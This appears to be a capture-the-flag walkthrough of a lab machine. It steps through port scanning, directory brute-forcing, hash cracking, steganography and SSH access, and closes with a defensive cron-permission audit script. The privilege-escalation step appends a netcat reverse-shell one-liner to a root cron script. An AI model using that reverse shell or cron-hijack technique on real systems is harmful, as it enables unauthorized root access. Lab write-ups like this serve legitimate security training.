Easy Peasy

Reconnaissance

Initial nmap scan to find all open ports

nmap -p- -T5 10.10.53.168

There are three ports open

Detailed Nmap scan:

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 80,6498,65524

  • (-oN nmap): Saving normal-format output to a file called nmap

nmap -sV -sC -p 80,6498,65524 -oN nmap 10.10.53.168

The version of nginx is 1.16.1

Apache is running on the highest port (65524).

Enumeration

Port 80: HTTP

Let's visit the site.

There is nothing interesting in the links provided or in the source code, so let's run gobuster to find hidden files and directories.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.53.168/

Looks like we found a directory. Let's run another gobuster scan against it while we explore this one.

We found another directory; let's visit both of these pages.

There seems to be nothing here, so let's go to the "whatever" directory.

There is nothing on the page, so let's look at the source code.

We have a hash; let's decode it.

We have the first flag.

Port 65524: HTTP

Let's visit the site.

It's an Apache 2 default page; scrolling down a bit, we find flag 3.

Let's run gobuster to find hidden directories and files.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.53.168:65524/

While gobuster is running, let's check the robots.txt page; we find some interesting information there.

This looks like a hash, so let's try to crack it. First, let's identify what type of hash it is.

It's an MD5 hash, so let's crack it.

And we have the second flag.

Looking back at the default page, we have something else in the source code.

Another hash. Let's crack it.

It's another directory; let's visit it.

It's a page with a binary-code image; let's look at the source code.

We have a string; let's try to identify the hash type.

Let's crack it.

Looks like it is a password.

Now let's download the binary-code picture and check whether anything is hidden in it using steghide.

steghide --extract -sf binarycodepixabay.jpg

It is asking for a password, so I used the one we just found.

We found a text file; let's read it.

We have a username and a password encoded in binary; let's decode it.

We have the password, so let's log in over SSH. Based on our nmap scan, the SSH server is running on port 6498.

ssh -p 6498 boring@10.10.53.168

We are logged in.

We can read the user.txt file, but it seems to be encrypted, so I will leave cracking it to you. (Hint: CyberChef and ROT13)

We can also answer all the other questions.

Privilege Escalation

As the room had cronjob as one of its tags, I looked for .sh files on the system that belonged to the user boring.

find / -type f -user boring -name "*.sh" 2>/dev/null

Looks like we have a file; let's look at it.

It says it will run as root, so we can append a reverse shell to the file to get a shell as root.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f" >> .mysecretcronjob.sh

Make sure to change the IP in the command to your own, and start a netcat listener on port 1234.

Once you echo the command into the file, the contents of the file should look like this.

After a while you should get a shell as root.
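From the defender's side, the weakness used here is a root cron job whose script a non-root user can edit. The following POSIX sh audit is an added example, not part of the original writeup: it reads an /etc/crontab-style file (assumed format: five time fields, a user, then the command) and flags every root job whose script is not owned by root or is group- or world-writable.

```shell
#!/bin/sh
# Added example, not from the original writeup: audit a crontab-style file for
# root jobs whose script a non-root user could modify.
# Assumed input format (/etc/crontab style): five time fields, a user, then the
# command. Blank lines, comments and NAME=value assignments are skipped, as are
# @reboot-style shortcuts. Only the first word of the command is checked.
# Prints one FINDING line per weak job; returns 0 if clean, 1 if anything was flagged.
cron_audit() {
    found=0
    while IFS= read -r line; do
        case "$line" in ''|\#*) continue ;; esac
        set -f                 # cron fields contain '*'; do not let the shell glob them
        set -- $line
        set +f
        case "$1" in *=*) continue ;; esac   # environment assignment such as SHELL=/bin/sh
        [ "$#" -ge 7 ] || continue
        user=$6
        script=$7
        [ "$user" = root ] || continue       # only root-run jobs matter for privilege escalation
        [ -f "$script" ] || continue         # the command must name an existing regular file
        reason=''
        [ -n "$(find "$script" ! -user root)" ] && reason="$reason not-owned-by-root"
        [ -n "$(find "$script" -perm -g+w)" ]  && reason="$reason group-writable"
        [ -n "$(find "$script" -perm -o+w)" ]  && reason="$reason world-writable"
        if [ -n "$reason" ]; then
            printf 'FINDING: root job %s is%s\n' "$script" "$reason"
            found=1
        fi
    done < "$1"
    return "$found"
}

# Stand-alone use (needs read access to the system crontab):
# cron_audit /etc/crontab
```

Per-user crontabs (crontab -l) lack the user column, so they would need the field offset adjusted before this check applies.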
